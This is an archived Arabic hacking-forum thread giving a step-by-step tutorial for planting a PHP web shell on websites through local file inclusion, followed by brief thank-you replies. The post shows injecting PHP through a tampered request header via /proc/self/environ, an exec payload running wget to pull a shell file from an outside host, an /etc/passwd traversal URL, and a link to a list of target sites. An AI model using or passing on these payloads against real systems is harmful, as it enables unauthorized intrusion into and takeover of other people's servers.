:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   رفع الشل من خلال ثغرات lif عبر Tamper Data (http://www.vbspiders.com/vb/t62666.html)

Abo MalaK 06-04-2012 04:41 PM

رفع الشل من خلال ثغرات lif عبر Tamper Data
 
السلام عليكم ورحمة الله وبركاتة

كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

المتطلبات
1. FireFox [download]
2. Tamper Data [download]
والموقع المراد التطبيق علية

انا جبت لكم كم موقع

http://pastie.org/private/7fbtucb1obczki7nk0xvxa


طيب نكمل

في البداية لازم نقدر نقرى proc/self/environ
http://im28.gulfup.com/2012-05-16/1337163837101.png
اضغط هنا لترى الصورة بحجمها الطبيعى

بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا
http://im28.gulfup.com/2012-05-16/1337163837352.png
بعد ماتشتغل معنا الاداة
نروح لم

http://im28.gulfup.com/2012-05-16/133716383713.png

بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة

http://im28.gulfup.com/2012-05-16/133716383894.png

بعدها نروح للمربع هاذا


http://im28.gulfup.com/2012-05-16/1337163838475.png

http://im28.gulfup.com/2012-05-16/1337163838266.png
في هاذا المربع وضعنا
<?php phpinfo();?>


عشان نقرة phpinfo ونضمن الشغل

بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل

http://adf.ly/673135/http://www.gulf...Xrrnldi00d74cc

بعدها ماتضغط وتتخطى

يفتح الموقع ويتم قراة phpinfo

http://im28.gulfup.com/2012-05-16/1337163838198.png

ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل

http://im28.gulfup.com/2012-05-16/1337163838519.png

<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system

ومع شوي تطوير راح تضبط

بعدها

نروح نشوف

راح يفتح الموقع مثل ماكان

طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd

ونحط
http://www.site.com/shell.php
http://im28.gulfup.com/2012-05-16/13371638388810.jpg

وباذن الله راح يتم الرفع الشل

منقول للفائده،

vpn_31 06-04-2012 04:49 PM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
تسلم على طرح ياغالي طريقة ذكية ولاكن ثغراة LFI شبه منقرضه

bleu moon 06-04-2012 04:56 PM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
شكرا، بس كان احسن انك تعمل موضوع مش تنقلوا من منتدى آخر

amer518 03-08-2015 03:03 PM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
مشكور اخوي ماقصرت

bheroxx55 03-12-2015 11:22 AM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
موضوعععععععععع رائع 77777777777777777777777

القناص88 03-20-2015 08:28 AM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
عاااااااااااااااااااااااشة ايدك

sniferpro 03-29-2015 03:15 PM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
merci

#حقو 04-02-2015 08:57 PM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
mercciiiiii

جهراوي هكر 07-09-2015 08:47 AM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
اشكرك اخوي .

جيكل 07-14-2015 02:03 AM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
شكرا على الطرح

pika-xerror 07-18-2015 11:30 PM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
شكرا لكم

seefnew 07-25-2015 03:03 AM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
شكرا أخي العزيز

rosabilaa0202 08-13-2015 04:34 PM

رد: رفع الشل من خلال ثغرات lif عبر Tamper Data
 
راااااااااااااااااااااااااااااااائع


الساعة الآن 01:58 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0